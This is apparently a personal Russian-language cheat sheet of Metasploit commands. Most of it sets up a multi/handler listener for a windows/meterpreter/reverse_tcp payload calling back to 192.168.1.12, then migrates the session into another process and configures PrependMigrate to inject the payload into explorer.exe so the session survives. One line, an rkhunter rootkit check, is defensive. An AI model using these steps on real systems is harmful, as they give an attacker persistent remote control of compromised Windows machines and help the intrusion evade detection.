Заметки

jobs -K - завершает все эксплоиты в метасплоит

rkhunter --check  - проверить Линукс на руткиты

Запуск слушателя на любой эксплоит

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.12

exploit

Миграция в другой процесс:

ps – список всех текущих процессов

migrate 3404 (номер процесса)

Для того что бы сохранить сессию можно мигрировать в другой процесс:

Отображаются абсолютно все параметры модулей пэйлоад и эесплоит.

show advanced

нас интересуют параметры:

PrependMigrate

PrependMigrateProc

PrependMigrate - активирует автоматическое мигрирование процесса. Чтобы его включить достаточно включить - true.

PrependMigrateProc - содержит имя процесса в который необходимо инжектировать пэйлоад.

Установим перечисленные параметры:

set prependmigrate true

set prependmigrateproc explorer.exe

run

😬